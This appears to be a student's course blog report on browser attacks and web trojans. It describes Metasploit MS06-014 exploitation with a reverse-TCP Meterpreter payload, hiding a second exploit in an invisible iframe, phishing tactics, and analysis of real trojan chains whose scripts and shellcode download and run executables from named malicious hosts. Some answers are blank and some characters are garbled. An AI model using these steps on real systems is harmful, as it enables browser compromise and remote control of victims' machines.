20199135 2019-2020-2 《网络攻防实践》第12周作业
学号 2019-2020-2 《网络攻防实践》第12周作业
| 问题 | 回答 |
|---|---|
| 作业所属课程 | 网络攻防实践(https://edu.cnblogs.com/campus/besti/19attackdefense) |
| 这个作业的要求在哪里 | https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10756 |
| 我在这个课程的目标是 | 学习第十二章 |
| 这个作业在哪个具体方面帮助我实现目标 | 熟悉linux环境 |
| 作业正文 | 见下文 |
| 参考文献 | 见博客结尾 |
1.实践内容
12.1.1 Web浏览器战争与技术发展
•浏览器战争
(1)第一次浏览器战争:1995—1998年间,对阵双方是网景公司的Netscape浏览器和微软公司的IE浏览器。
(2)第二次浏览器战争
•浏览器技术发展
20世纪90年代初诞生的古典命令行浏览器仅仅实现了简单的HTTP客户端、HTML解析与渲染功能,而在浏览器的商业化与商业竞争过程中,出现了高度注重用户使用感受的图形界面浏览器软件,并逐步提供了对图片、音视频等多媒体的支持,通过XML对结构化信息的输入、存储与展现功能的支持,以及引入客户端执行机制、与服务器的异步交互以及浏览器可扩展性机制,逐步进化出目前互联网用户所依赖的现代浏览器。
12.1.2 Web浏览的安全问题与威胁
• web浏览器软件的安全困境三要素
表现在复杂性可扩展性连通性三方面
• Web浏览安全威胁位置
12.2.2网页木马的机理分析
•网页木马的定义特性
网页木马从本质特性上是利用了现代Web浏览器软件中所支持的客户端脚本执行能力,针对Web浏览端软件安全漏洞实施客户端渗透攻击,从而取得在客户端主机的远程代码执行权限来植入恶意程序。
我们定义网页木马是对Web浏览端软件进行客户端渗透攻击的一类恶意移动代码,通常以网页脚本语言如JavaScript. VBScirpt实现,或以Flash、PDF等恶意构造的Web文件形式存在,通过利用Web浏览端软件中存在的安全漏洞,获得客户端计算• 机的控制权限以植入恶意程序。
•对网页木马机理的全方位分析与理解
网页木马的攻击是被动式的,需要通过一地技术方法来诱使互联网用户来访问网页木马页面。往往涉及较为复杂的多步骤攻击场景,并需要多种类型的恶意代码及网络资源。
•网页木马的本质核心——浏览器渗透攻击
网页木马的本质核心是利用Web浏览端软件安仝漏洞的渗透攻击代码。
•网页挂马机制
网页挂马的机制很多,有如下四类策略。
(1) 内农HTML标签
(2) 恶意Script脚本
(3) 内嵌对象链接
(4) ARP欺骗挂马
•混淆机制
除了引入中间跳转节点进行嵌套链接,并集成多种渗透攻击代码之外,往往采用了大量的混淆技术,从而使得网页木马攻击网络更难被检测和摧毁,这些混淆技术也被称为“免 杀"。
12.2.3网页木马的检测与分析技术
•基于特征码匹配的传统检测方法
•基于统计与机器学习的静态分析方法
•基于动态行为结果判定的检测分析方法
•基于模拟浏览器环境的动态分析检测方法
12.2.6网页木马防范措施
应对网页木马最根木的防范措施与应对传统渗透攻击一样,就是提升操作系统与浏览端平台软件的安全性。
1.采用操作系统本身提供的在线更新以及第三方软件所提供的常用应用软件更新机制,来确保所使用的计算机始终处于一种相对安全的状态。
2.安装与实时更新一款优秀的反病毒软件也是应对网页木马威胁必不可少的。
3.养成安全上网浏览的良好习惯,并借助J - Google安全浏览、SiteAdvisor等站点安全评估工具的帶助, 避免访问那些可能遭遇挂马或者安令性不髙的网站,可以有效地降低被网页木马渗透攻击的概率。
4.在目前网页木马威胁主要危害Windows平台和IE浏览器用户的情况R 或许安装Mac OS/Linux操作系统,并使用Chrome、Safari、Opera等冷门浏览器进行上网,可以有效地避免网页木马的侵扰。
12.3.2网络钓鱼攻击技术策略
①在指向假冒网站的链接中使用1P地址代替域名。
②注册发音相近或形似的DNS域名(如与工商银行域名icbc.com.cn仅有一个字母 之差的lcbc.com.cn),并在上而架设假冒网站,期望用戸不会发现他们之冋的差异。
③在一个假冒钓鱼网站的电子邮件HTML内容中嵌入一些指向真实的目标网站链接, 从而使得用户的网站浏览器大多数HTTP连接是指向真实的目标网站,而仅有少数的关键连接(如提交敏感信息的页面)指向假冒的网站。
④对假冒网站的URL进行编码和混淆,很多用户不会注意到或者理解URL链接被做过什么处理,并会假设它是良性的。
⑤企图攻击用户网页浏览器存在的漏洞,使之隐蔵消息内容的实质。
⑥将假冒的钓鱼网站配置成记录用尸提交的所有数据并进行不可察觉的日志,然后将用户重定向到真实的网站。
⑦架设一个假刊网站,作为目标机构真实网站的代理。
⑧通过恶意代码在受害者计算机上安装一个恶意的浏览器助手。
⑨使用恶意代码去修改受害者计算机上的用来维护DNS域名和IP地址映射的本地 hosts文件。
12.3.3网络钓鱼攻击的防范
①针对网络钓鱼过程中的电子邮件和即时通信信息欺诈,应该提高警惕性。
②充分利用浏览器软件、网络安全厂商软件所提供的反钓角。
③在登录网上银行、证券基金等关键网站进行在线金融操作时,务必要垂视访问网站的真实性,不要点击邮件中的链接来访问这些网站,最好以直接访问域名方式来访问,尽量使用硬件u盾来代替软证书或口令访问重要的金融网站。
④通过学习和修炼提升自己抵抗社会工程学攻击的能力。
2.实践过程
动手实践一一Web浏览器渗透攻击实验
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
所需环境:
①攻击机:BT4 Linux攻击机或Windows XP_Attacker攻击机,使用其中安装的 Metasploit渗透攻击框架软件;
②靶机:未打补丁的Windows靶机,可使用Windows 2KS靶机或Windows XP靶机。 实验步骤;
①选择使用Metasploit中的MS06-0I4渗透攻击模块(ie_createobject);
②选择PAYLOAD为任意远程Shell连接:
③设置服务器地址(SVRHOST或LHOST)和URL参数,运行exploit,构造出恶意 网页木马脚本;
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问恶意网页木马脚本URL;
⑤在攻击机的Metasploit软件中査看渗透攻击状态,并通过成功渗透攻击后建立起的 远程控制会话SESSION,在靶机上远程执行命令。
1.首先启动Metasploit,然后搜索漏洞MS06-014信息,执行use命令选择该漏洞
2.然后设置本地ip为攻击机ip,执行set Lhost 192.168.200.2,将恶意服务器地址配置为本机
3.最后设置载荷,这里选择使用常用的,执行set payload windows/meterpreter/reverse_tcp
4.启动攻击,然后生成了恶意链接,并建立了一个恶意服务器
5.将该恶意链接复制到靶机ie浏览器地址栏打开,然后会发现在攻击机上出现了反馈信息
6.查看会话列表,发现了靶机同攻击机建立的连接,然后执行sessions -i 1,选择该会话
7.成功实现远程控制了靶机,可对靶机输入命令执行
Web浏览器渗透攻击对抗实验
在实践一中已经用了一个MS06-014漏洞进行攻击,在靶机访问metasploit里生成的链接,攻击机即可获取到会话,并且控制靶机;
1.把靶机访问的链接的网页给保存下来,然后打开分析,发现该网页为了防止被杀毒软件查杀,对关键指令做了字符串拼接处理和使用了大量的空白和间隔。
去除无效回车符和空格后,得到了完整的网页信息,然后可以看到,该网页中的JavaScript使用了createObject,GetObject,Wscript.shell,
Adobe.stream等指令
2.然后可以看到,下图中使用js调用了document.location加载了payload,并且下一行中后面跟了一个可执行文件fHEzfuTlSyw.exe;猜想这个可执行文件应该是以攻击机为服务器,通过网页下载到靶机上的,而且为了躲避杀毒软件,每次加载恶意网页生成的可执行文件的名字是不一样的,同时打开靶机任务管理器查看正在运行的程序,果然发现了在网页源码中出现的那个可执行文件,这个应该是帮助攻击机获取靶机控制权限的恶意程序。
3.分析整个页面,整个网页在访问的时候只会在中出现随机的字符串,并没有什么奇怪的地方,刚开始并不清楚该如何将两个漏洞的攻击合并到一个恶意链接中,前面的挂马分析给了我灵感,是否可以通过metasploit利用其它浏览器漏洞再生成一个恶意链接,我们分析的这个恶意网页的内容主体中插入一个隐藏状态的内联框架,其中的链接指向新的恶意链接地址,然后将两个恶意网页放到攻击机apache的www目录下呢,尝试了一下使用另外一个漏洞极光,将生成的恶意链接放到内联框。
4.将修改后的恶意网页放到www目录下,同时启动metasploit进行监听,依旧能够监听到会话,并且有多个会话
5.成功获取了靶机的控制权限。
取证分析实践:剖析一个实际的网页木马攻击场景
1.由于题目附带的材料中给出的网址已经失效,无法还原真实的网页木马攻击场景,只能根据材料提供的一些文件来进行分析,首先用记事本打开start.htm,然后分析了一下,发现在该网页嵌入了一个内联框架,指向了一个网页new09.htm,且该内联框架高度宽度为0,不容易被发现
2.指向new09.htm网页使用的是相对路径,说明new09.htm应该是跟start.htm在同一个目录下,于是修改url,获取到new09.htm页面信息,分析,发现其通过内联框架指向了一个页面http://aa.18dd.net/aa/kl.htm,还使用script指向了另一个页面http://js.users.51.la/1299644.js
3.按照实验指导书步骤获取指向的两个网页内容以后打开分析,发现其中一个里面没有什么有用的信息,打开另外一个,发现里面很多信息,似乎被加密过,无法分析出有效信息,于是将整个网页信息复制到FreShow工具的内容框中(这是一个用于js加解密的工具),然后点击解码按钮,在下方的框中生成了解码后的信息,可以简单分析出使用了base64进行编码加密,密码为"script"
4.然后将其中一段复制到FreShow工具的内容框中(这段内容哪里来的没看懂,实验指导书上没写明白),进行解码,得到如下信息,显示有些错乱,经过整理后发现用到的应用程序漏洞有“Adodb.Stream”、“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”,分别对应利用了微软数据库访问对象、 暴风影音、PPStream 和百度搜霸的漏洞;最后还有一个下载恶意程序的行为。
5.然后打开材料提供好的1.js进行分析,同样将内容复制到FreShow工具的内容框中进行解码,然后生成信息如下图,该js文件下载了一个exe可执行文件
6.接下来使用同样的方法来分析b.js,但是发现使用FreShow根本无法解码,试了实验指导书上的解码网站,也无法访问,只能根据实验指导书解码的内容进行分析了;解码后的内容里有shellcode,可能是使用了该方式进行攻击。
7.由于要执行的exe文件已经在参考资料中提供,所以直接打开分析,首先使用peid打开bf.exe查看是否加壳,发现没有加壳,并且该程序是使用Delphi开发的
8.然后使用W32Dasm工具进行反编译,查看字符串信息,可以看到,该程序自启动了IE浏览器,并生成一个bat批处理文件,然后是执行了删除操作,删除一些文件,还从恶意网站下载了20个恶意程序到受害者主机上;shell\Auto\command=说明了该程序会自动执行shell指令,启动受害者主机目录下的一个程序;最后还发现了"瑞星卡卡上网安全助手 - IE 防漏墙","允许", "允许执行",这个应该是防止被杀毒软件查杀的设置。
9.参考资料里已经提供了这20个恶意程序,尝试着分析其中一个4.exe,首先使用peid打开,然后发现该程序已经加壳,然后再用超级巡警脱壳机进行脱壳,再用peid打开脱壳后的程序,发现还有一个壳"Morphine 1.2 - 1.3 -> rootkit",根据实验指导书上的解释,这是一个伪装壳,不需要管它,然后我尝试了使用IDA、W32Dasm等进行反汇编,发现提示缺少头文件,无法打开,最后使用的是C32Asm成功打开了脱壳之后的4.exe,然后查看字符串信息,看到关键信息"bat",似乎又执行的是批处理文件,但是具体内容无法分析出来,里面有很多乱码
10.由于无法分析恶意程序内容,只好在先尝试着运行这些恶意程序,下载了360卫士,将恶意程序拖到安全沙箱里运行,然后发现监测出了大量的木马和恶意程序,恶意程序在windows系统文件目录下生成了可执行程序和dll动态链接库文件
实践回答:
1.
2.使用了base64进行编码加密,密码为“script”,直接使用工具FreShow即可解密
3.MS06-014网马、暴风影音网马、PPStream网马、百度搜霸网马
4.解密后发现通过js中的指令从恶意站点下载了可执行文件,下载器即为bb/014.exe,执行该程序将从恶意站点down.18dd.net下载20个恶意程序
5.将执行恶意程序4.exe后在windows系统目录下生成的一个恶意木马提取出来,首先使用peid打开查看发现没有加壳,然后使用反汇编工具打开查看字符串信息,发现一个关键信息send,猜想可能是将受害者主机上的某些信息发送到目标地址,然后下面还有一个url信息,由于字符显示问题,并不能分析出该url指向何处。
Web浏览器遭遇攻击
1.列出在捕获文件中的应用层协议类型, 你认为攻击是针对哪个或哪些协议的?
应用层协议主要有
(1)域名系统(DNS):用于实现网络设备名字到IP地址映射的网络服务。
(2)文件传输协议(FTP):用于实现交互式文件传输功能。
(3)简单邮件传送协议 SMTP):用于实现电子邮箱传送功能。
(4)超文本传输协议(HTTP):用于实现WWW服务。
(5)简单网络管理协议(SNMP):用于管理与监视网络设备。
(6)远程登录协议(Telnet):用于实现远程登录功能。
2.用wirshark打开pcap文件,可以统计一下主要流量为HTTP/TCP协议。应该是针对TCP协议。
3.列出捕获文件中的 IP 地址、主机名和域名。从这些信息中你能猜出攻击场景的环境配置情况吗?
通过统计功能,并在wireshark显示IP地址对应名称,可以选择Name resolution复选框。要查看IP名称解析,进入View | Name Resolution | Enable for Network layer进行激活。攻击场景应该是虚拟机,因为出现了很多mac地址相同的主机。
4.列出捕获文件中的所有网页页面, 其中哪些页面包含了可疑的、可能是恶意的
JavaScript 脚本代码?谁在连接这些页面?请描述恶意网页的攻击目的?
5.打开session_0006.part_01.html,现了如下界面,这应该是一个钓鱼网站,显然是恶意创建的对应的就是Rapidshare.com的高级账号(网站创立于2003年,是世界知名的文件上传下载托管服务网站)
6.根据资料提示再查看session_0032.part_01.html,会提示网站受损。
7.再找到session_0007.part_02.html。
8.请给出攻击者执行攻击动作的概要描述(ip地址10.0.2.15)。
其首先让受害者登陆到构建的假的Rapidshare.com,在里面的js脚本将该内容又被重定向到sploitme.com.cn/fg/show.php?s=3feb5a6b2f, 其中包含一些javascript。最后返回一个404界面。
9.攻击者的目标是哪个操作系统,哪些应用软件,哪些安全漏洞?如何阻止这些攻击?
追踪TCP 流,可以看到这是一个针对Windows XP系统下IE浏览器漏洞。
10.Shellcode 执行了哪些动作?请列出 Shellcode 的 MD5,并比较它们之间的差异?
Shellcode获取系统临时文件路径,加载urlmon.dll,从 URL http://sploitme.com.cn/fg/load.php?e=1检索可执行文件,然后执行它。 Shellcode 之间的唯一区别是对load.php脚本的请求中的e变量,该变量指定发送恶意软件可执行文件。
11.在攻击场景中有二进制可执行恶意代码参与吗?它们的目的是什么?
有,目的是下载可执行文件并在本地执行。
3.实践总结
除了实践一,其他的真是好难啊,不参考无从下手,参考了还是有卡壳,不愧是压轴实践(哭泣+怀疑人生)。
